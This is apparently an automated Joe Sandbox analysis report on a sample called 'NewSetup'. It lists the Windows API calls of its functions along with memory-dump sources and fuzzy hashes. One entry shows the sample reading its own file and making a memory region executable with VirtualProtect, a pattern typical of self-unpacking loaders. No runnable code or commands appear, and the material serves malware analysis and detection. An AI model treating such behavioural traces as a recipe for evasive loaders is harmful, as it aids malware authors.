• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
• Instruction ID: 532315da9c31262536a987e23da17491656ef861286c06dc28025179f88ff773
• Opcode Fuzzy Hash: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
• Instruction Fuzzy Hash: 6CF1CE75A102188FCB14CF68C494BADBBF2FF88324F198269E915AB391D774AD51CF90

Control-flow Graph

APIs
• CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00225392
• GetLastError.KERNEL32(?,?,?,00212513,00000000,00000000), ref: 0022539E
• __dosmaperr.LIBCMT ref: 002253A5
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 59b772d52746fc60a858ec35e82a306c03d481c23bd0dc25e45a6bc31e5549a1
• Instruction ID: b18607044b1db3640f79d030db46bfde825905ccdd127bca016e32fb100ff8d6
• Opcode Fuzzy Hash: 59b772d52746fc60a858ec35e82a306c03d481c23bd0dc25e45a6bc31e5549a1
• Instruction Fuzzy Hash: 3A01407252563ABBDF15EFE4FC09AAE7B65FF01351F108099F80196150EBB0D960DB50

Control-flow Graph

APIs
  • Part of subcall function 0022C2BB: GetLastError.KERNEL32(00000000,?,002276E9,0022D306,?,?,0022C1B7,00000001,00000364,?,00000006,000000FF,?,00225495,00248E38,0000000C), ref: 0022C2BF
  • Part of subcall function 0022C2BB: SetLastError.KERNEL32(00000000), ref: 0022C361
• CloseHandle.KERNEL32(?,?,?,002253D9,?,?,002254CE,00000000), ref: 0022551F
• FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,002253D9,?,?,002254CE,00000000), ref: 00225535
• ExitThread.KERNEL32 ref: 0022553E
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: ErrorExitLastThread$CloseFreeHandleLibrary
• String ID:
• API String ID: 1991824761-0
• Opcode ID: c8a94e912060c5ec5f8c664221151833a432d72b3a4272ce21ff6b1d367c8a4f
• Instruction ID: 790f663b92db6b76949d1fb0902090e2626aaeb0d3362b3190f1ec0fd6001d63
• Opcode Fuzzy Hash: c8a94e912060c5ec5f8c664221151833a432d72b3a4272ce21ff6b1d367c8a4f
• Instruction Fuzzy Hash: B0F05470110E3277CB256FF5F84C61A3A9AAF01370B58C614F869CB1A0DB30DD728751

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,00225721,00228396,00228396,?,00000002,456001D6,00228396,00000002), ref: 00225670
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00225721,00228396,00228396,?,00000002,456001D6,00228396,00000002), ref: 00225677
                                                                                                      • ExitProcess.KERNEL32 ref: 00225689
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 4439a6869094a0b3b79fa7517e97f11c26ab166e2903c07a5bd897a18da92111
                                                                                                      • Instruction ID: b39eda23bee40f3af56c62292d2fcdbba9a93c79fb693b12e12af97d2700a9bc
                                                                                                      • Opcode Fuzzy Hash: 4439a6869094a0b3b79fa7517e97f11c26ab166e2903c07a5bd897a18da92111
                                                                                                      • Instruction Fuzzy Hash: 75D09235010628BBCF116FA1FC4D8A93F2AEF42782B848011B9594A072DF329962DA85

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00233F9E: GetConsoleOutputCP.KERNEL32(456001D6,00000000,00000000,?), ref: 00234001
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00228584,?), ref: 00233D79
                                                                                                      • GetLastError.KERNEL32(?,?,00228584,?,002287C8,00000000,?,00000000,002287C8,?,?,?,00248FE8,0000002C,002286B4,?), ref: 00233D83
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2915228174-0
                                                                                                      • Opcode ID: 768f45cb0a7f468ec24fffcabc6a77a6127f3444ff9eca8db259cbffcedf3aee
                                                                                                      • Instruction ID: 5a39c134629971e4e9c83e85a6893a4feeb8c1915586cbf5b8ff8a14a264b009
                                                                                                      • Opcode Fuzzy Hash: 768f45cb0a7f468ec24fffcabc6a77a6127f3444ff9eca8db259cbffcedf3aee
                                                                                                      • Instruction Fuzzy Hash: 386191F592411AAFDF11DFA8D885AEEBBB9BF09314F140586E800A7251D771DB21CBA0

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00233D5F,00000000,002287C8,?,00000000,?,00000000), ref: 00234469
                                                                                                      • GetLastError.KERNEL32(?,00233D5F,00000000,002287C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00228584), ref: 0023448F
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: 0ab598ab955fbdca7f0558e457921a157813a620e1bd3e57b5e98722d3ee0bd0
                                                                                                      • Instruction ID: ef9cfe421feaf601efe7e22b6ea109072497bbbf1c53682554f87ddf8ef16b5b
                                                                                                      • Opcode Fuzzy Hash: 0ab598ab955fbdca7f0558e457921a157813a620e1bd3e57b5e98722d3ee0bd0
                                                                                                      • Instruction Fuzzy Hash: 7321AD74A10219DBCF19DF29DC80AE9B7B9FB49305F2440E9EA06D7211D630EE52CF60

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002191C9
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002191D7
                                                                                                        • Part of subcall function 0021EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00218E4A,0021A2F0), ref: 0021EFE7
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3666349979-0
                                                                                                      • Opcode ID: 796bfb3b07f573f8f48dc2f4906c322af013e3d2f137380f5f9f612c67868b8c
                                                                                                      • Instruction ID: c08171889a8f7baf86b3bc1ff9d446316846aa08f89bc08ffcc4a901d728903e
                                                                                                      • Opcode Fuzzy Hash: 796bfb3b07f573f8f48dc2f4906c322af013e3d2f137380f5f9f612c67868b8c
                                                                                                      • Instruction Fuzzy Hash: 3321F1B0A0064A9BDB109F64CD45BEEBBF4FF14320F144228E92967381D774A9A5CBD2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0022D941,00249330,0000000C), ref: 0022DA9E
                                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0022D941,00249330,0000000C), ref: 0022DAB0
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: e0b17d9ba95ae17bd47b19f0bebe3b21e13688c43ca6ed483947550a30535d26
                                                                                                      • Instruction ID: ff197ad9c3d5a1439ce2a49f54e730bad2586fc43b49c0707c78207cde165d38
                                                                                                      • Opcode Fuzzy Hash: e0b17d9ba95ae17bd47b19f0bebe3b21e13688c43ca6ed483947550a30535d26
                                                                                                      • Instruction Fuzzy Hash: F811DA7152C7A36EC7308EBEAC8CA227A95BB57330B38075AD0B6865F1CAB5D856D101

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
                                                                                                      • FreeConsole.KERNELBASE(?,?,?,?,?,0021173F,?,?,?,00000000,?), ref: 00211F21
                                                                                                      • VirtualProtect.KERNELBASE(0024A011,00000549,00000040,?), ref: 00211F78
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1248733679-0
                                                                                                      • Opcode ID: 49e6c4b92792705b5a1dc96a104e864d285f1109f68066fae117dc3af92560a0
                                                                                                      • Instruction ID: 0b9a85ff06412e2f4ed78b7edde90010eb5fecaf49a0b7147175cfd4ff0006ad
                                                                                                      • Opcode Fuzzy Hash: 49e6c4b92792705b5a1dc96a104e864d285f1109f68066fae117dc3af92560a0
                                                                                                      • Instruction Fuzzy Hash: 39110675A502086BDB04BB64AC07FFE77B8EB45700F104429FA04A72C2E67599B04BD5
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00248E38,0000000C), ref: 00225483
                                                                                                      • ExitThread.KERNEL32 ref: 0022548A
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: c69dd99bb09a922fde654a1d2e203f6f99d725a9768dbf426a075d4eda07d913
                                                                                                      • Instruction ID: 684c3e71bac80ecebaaf752a89f529941c138bf8faf5a8a9cf365e9e073d18b0
                                                                                                      • Opcode Fuzzy Hash: c69dd99bb09a922fde654a1d2e203f6f99d725a9768dbf426a075d4eda07d913
                                                                                                      • Instruction Fuzzy Hash: 71F08C75A60625AFDB10AFB0E84EA6E7B70EF02711F208059F40597292CB7469A2CF91
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00212288
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0021229C
                                                                                                        • Part of subcall function 00211FB0: CreateFileA.KERNELBASE ref: 00212036
                                                                                                        • Part of subcall function 00211FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
                                                                                                        • Part of subcall function 00211FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0021206B
                                                                                                        • Part of subcall function 00211FB0: CloseHandle.KERNELBASE(00000000), ref: 0021207A
                                                                                                        • Part of subcall function 00211FB0: _strlen.LIBCMT ref: 002120CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3505371420-0
                                                                                                      • Opcode ID: c40ad02e84c92c93519458df5581dbf242fb4d7697a77b368cdc5ee8402ec8dc
                                                                                                      • Instruction ID: 36c8dba07fce1373977d540127f6206a925f14ae3042f967c2f560b4e0342160
                                                                                                      • Opcode Fuzzy Hash: c40ad02e84c92c93519458df5581dbf242fb4d7697a77b368cdc5ee8402ec8dc
                                                                                                      • Instruction Fuzzy Hash: 82F0E5B191125067D6216724FC4FEEB7BACDF96710F000514F5894A281EA7451658A93
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,002302B4,?,00000000,?,?,0022FF54,?,00000007,?,?,0023089A,?,?), ref: 0022BEED
                                                                                                      • GetLastError.KERNEL32(?,?,002302B4,?,00000000,?,?,0022FF54,?,00000007,?,?,0023089A,?,?), ref: 0022BEF8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 03ba62490681eaa2ba611fe9cbc9ede0a2440944084fdd4225da14a3499db925
                                                                                                      • Instruction ID: 3af4d128234db2edc2e2b6c19d080be73b64ccbd2707b5c817942e84da82aed9
                                                                                                      • Opcode Fuzzy Hash: 03ba62490681eaa2ba611fe9cbc9ede0a2440944084fdd4225da14a3499db925
                                                                                                      • Instruction Fuzzy Hash: E8E0C276208224BBCB122FF5FC0CB993B68EB12391F114022F60896570CB308860CF94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06646790285ab86a3082b62b5401ef3138b96cc82342f31f184284c9ba6e86d0
                                                                                                      • Instruction ID: 8a3b1e6210725fe69229f3d463e78197589b68253c4f5abc3cfe342df46752dd
                                                                                                      • Opcode Fuzzy Hash: 06646790285ab86a3082b62b5401ef3138b96cc82342f31f184284c9ba6e86d0
                                                                                                      • Instruction Fuzzy Hash: 1D416C31A2011AEBCF14DF68C8949EDB7F9BF29310B540169E442E7A40E771EAA59B90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3904a46561abed6ba51411b1e6679709c40f3fa676eb4dc4009715957e215503
                                                                                                      • Instruction ID: f87f635d0d8c69e6b721394f1a439d924be45269af77cef6fe2ea3d781313c82
                                                                                                      • Opcode Fuzzy Hash: 3904a46561abed6ba51411b1e6679709c40f3fa676eb4dc4009715957e215503
                                                                                                      • Instruction Fuzzy Hash: EE31A77592411AAFCB04CF68D8809DEB7F8BF19324B240266E411E3690D731EDA4CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 0021AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00218A2A,?,?,0021AF87,00218A2A,?,0021AF58,00218A2A,?,?,?), ref: 0021AFD0
                                                                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,456001D6,?,?,?,Function_0002BE94,000000FF), ref: 0021B0C7
                                                                                                        • Part of subcall function 0021AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 0021AF1B
                                                                                                        • Part of subcall function 0021EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00218E4A,0021A2F0), ref: 0021EFE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3627539351-0
                                                                                                      • Opcode ID: 934bb91aabd4cd94c948c9455a103d249ef5f77337a5e575063d84b1c1719b6b
                                                                                                      • Instruction ID: da4d68342da8e10debeb12bbd3dd5494dd1e55262e2f13c5a9ce87af755966fc
                                                                                                      • Opcode Fuzzy Hash: 934bb91aabd4cd94c948c9455a103d249ef5f77337a5e575063d84b1c1719b6b
                                                                                                      • Instruction Fuzzy Hash: 6011383661060557CB266F29EC09EAE77E9EF62B20F10441AF80187AD1CB35D8A1CE41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d2c598c76b91b085e797ceb1121d53e01b6a2ebd6360b43d13765e8aa1c0638
                                                                                                      • Instruction ID: 82034ca6203beda9973558bd924c4a330ed882b0086fe5a1bf8416111210f4cf
                                                                                                      • Opcode Fuzzy Hash: 4d2c598c76b91b085e797ceb1121d53e01b6a2ebd6360b43d13765e8aa1c0638
                                                                                                      • Instruction Fuzzy Hash: B501F537234235BF9F168FE8FC44916336ABBC2720B264125F9008B0A4DB31D9219B60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLeaveSection
                                                                                                      • String ID:
                                                                                                      • API String ID: 3988221542-0
                                                                                                      • Opcode ID: f0b364f768d41173196ef20c6453c0e08cd97bfbb037219795f6f2f6c9fb56d4
                                                                                                      • Instruction ID: 20b83f12c36a0505c7adf983b9b8b828873e2154376718701c2c2699b17968b3
                                                                                                      • Opcode Fuzzy Hash: f0b364f768d41173196ef20c6453c0e08cd97bfbb037219795f6f2f6c9fb56d4
                                                                                                      • Instruction Fuzzy Hash: C001217E6AC2875ECB059E78F8252E9BBA0FFB5338B34416FD011C4581CB2298B0C780
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 002177C6
                                                                                                        • Part of subcall function 0021AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,002178DA,00000000), ref: 0021AF72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                      • String ID:
                                                                                                      • API String ID: 312417170-0
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0022DF35,?,?,0022DF35,00000220,?,00000000,?), ref: 0022BF43
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
